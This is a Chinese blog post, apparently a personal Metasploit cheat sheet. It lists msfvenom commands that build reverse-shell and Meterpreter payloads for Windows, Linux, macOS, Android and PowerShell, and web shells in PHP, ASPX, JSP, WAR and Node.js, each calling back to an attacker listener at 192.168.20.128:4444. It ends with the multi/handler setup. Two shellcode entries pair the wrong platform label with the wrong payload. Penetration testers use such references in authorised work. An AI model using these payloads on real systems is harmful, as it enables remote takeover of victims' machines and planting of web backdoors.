msf-更新中

已于 2024-01-30 10:08:53 修改
阅读量189 收藏
点赞数 2
文章标签: 网络
于 2024-01-29 16:37:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53639243/article/details/135915566
版权

 shell乱码解决

chcp 65001

msf更新

apt install --only-upgrade metasploit-framework

Payload生成方式

(1)windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f exe > shell.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f exe > shell.exe

(2)liunx

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f elf > shell.elf

(3)mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f macho > shell.macho

(4)android

msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 R > test.apk

(5)Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1

(6)shellcode(windows)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f c

(7)shellcode(linux)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f c

(8)shellcode(mac)

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f c

反弹shell生成方式

(1)python

msfvenom -p cmd/unix/reverse_python LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py

msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py

(2)bash

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.20.128 LPORT=4444 -f raw > shell.sh

(3)Perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.20.128 LPORT=4444 -f raw > shell.pl

(4)Lua

msfvenom -p cmd/unix/reverse_lua LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.lua

(5)Ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.rb

(6)php

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

(7)aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f aspx -o shell.aspx

(8)asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f asp > shell.asp

(9)jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.jsp

(10)war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f war > shell.war

(11)nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.js

MSF监听设置

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST 192.168.20.128
set LPORT 4444
show options #查漏补缺
exploit

青梅fox
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf-haskell:Haskell Metasploit远程API的实现
05-31
无国界医生哈斯克尔 介绍 该目录包含 Haskell Metasploit 绑定和库,以及描述该库目的和使用的。 简而言之, 是一个广泛部署的开源渗透测试平台。... 截至 2013 年初,此绑定与 MSF API 兼容,但尚未在更新
70-70.渗透测试-kali更新msf.mp4
最新发布
05-10
70-70.渗透测试-kali更新msf.mp4
kaliMSF更新(完美升级)
LizimU_0911的博客
12-14 4830
1. 首先在root权限下进入命令行模式 2. 找到etc文件夹下的apt文件夹的sources.list文件 3. 使用vi命令进入编辑模式,添加如图所示的内容:
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2070
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
一、初识Metasploit(MSF使用详解超详细)
qq_59235193的博客
01-27 2832
模块名称模块作用Auxiliary负责执行信息收集,扫描,嗅探,指纹识别,口令猜测和Dos攻击等功能的辅助模块Exploits利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动,被动)Payloads成功exploit之后,真正在目标系统执行的代码和命令。Post后期渗透模块,在取得目标系统远程控制权后吗,进行一系列的后渗透攻击动作,如获取敏感信息,跳板攻击等操作.Encoders对payload进行加密,躲避antiviru检查的模块。Nops。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 3400
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版,改成了用Ruby语言编写的了。在kali,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
MSF以及Samba漏洞利用
zyh18851473527的博客
11-15 6667
文章目录MSF以及Samba漏洞利用一、Metasploit简介1.1MSF启动1.2问题报错1.2.1及时更新源1.2.2下载数据库二、Metasploit基础2.1专业术语2.2渗透攻击步骤三、主机扫描3.1使用辅助模块进行端口扫描3.1.1检查有哪些可用端口3.1.2一个小问题**3.1.3使用TCP扫描模块并检查有那些参数需要设置**3.1.4使用unset取消某个参数3.2使用辅助模块进行服务扫描3.3使用Nmap扫描3.3.1系统扫描四、漏洞利用4.1Metasploitable2搭建4.2 S
如何更新msf及其结构
10-08
更新msf 及其结构 exploit framework 的利用 很不错的哦
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
PHP-MSF 入门教程之服务&路由&应用
11-15
php-msf由Camera360服务器团队主导研发,会持续更新与维护,也希望有更多优秀的Swoole应用实践开发者加入。php-msf核心设计思想是采用协程、异步、并行的创新技术手段提高系统的单机吞吐能力,降低整体服务器成本。
msf更新
01-10 1090
apt update; apt install metasploit-framework
Metasploits Git更新
dj1174232716的专栏
08-05 2303
一:git下载最新版& {, `, L9 a5 b- p9 D #cd /opt/metasploit/ root@bt:/opt/metasploit# #rm -rf msf36 L& h. ~- c. k0 _5 } root@bt:/opt/metasploit# git clone https://github.com/rapid7/metasploit-framework.git
2021-8-5 kali更新msf
qq_45290991的博客
08-05 1199
 Kali更新msf的命令: sudo apt update apt install metasploit-framework MSF更新后查看如下图:
kalimsf自动更新
qq_43017796的博客
07-17 5944
现版本kali已无法使用msfupdate进行更新。 1.apt update 查看当前可更新内容 2.apt install metasploit-framework 3.输入msfconsole,即可查看当前更新后的版本。
metasploit 更新
wjy397的专栏
10-24 7730
http://blog.sina.com.cn/s/blog_4c86552f0102wlct.html 1、修改更新源: vi /etc/apt/sources.list 填入: deb http://http.kali.org/kali kali-rolling main non-free contrib //官方源 //科大kali源
Kali更新 以及 安装MSF命令 和其他更新升级相关的命令
hanzhen668的博客
09-04 4735
/etc/apt/sources.list vim打开文件 在文档加入以下更新源 #科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 #deb http://mirrors.aliyun.com/kali kali-rolli...
msf如何升级_BT5升级MSF至Git更新的方法
weixin_39990138的博客
12-19 154
由于Kali在虚拟机的运行效率实在让人不敢恭维,于是决心将BT5MSF进行升级,升级的主要目的是,BT5R3内置的MSF是用SVN进行更新, 但是新版本的MSF已经停止通过SVN更新,改用Git,必须重新安装。网上找了很多办法,看见帖子里明明升级成功,但是自己总是不成功,卡在pg (0.15.0)无法成功安装,个人认为的原因是MSF并没有用BT5内置的RUBY,而是利用自带的RUBY,其自带的...
Msfconsoleset payload命令最新改进
大学霸__IT达人
02-26 2865
Msfconsolesetpayload命令最新改进 为了方便用户的输入,Msfconsole改进了setpayload命令的输入。在执行setpayload命令时,可以使用三种前缀,分别是/payload、payload、和/。或者,不使用任何前缀,直接指定攻击载荷路径即可。其,可以执行的四种方式如下所示: (1)msf5exploit(windows/smb/ms17_010_et...
msf如何升级_Kali linux 2016.2(Rolling)的Metasploit如何更新与目录结构初步认识...
weixin_39999586的博客
12-19 611
如何更新MSF1、Windows平台方法1:运行msfupdate.bat在msfconsole里执行命令svn update或者方法2:2、unix/linux平台方法1:运行msfupdate即可。方法2:(比较麻烦)安装subversion客户端(--with-ssl),之后连接CVS server进行MSF更新。https://github.com/rapid7/metasploit-f...
msf之ms12-020的复现
05-24
MS12-020是远程桌面协议(RDP)的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSF(Metasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值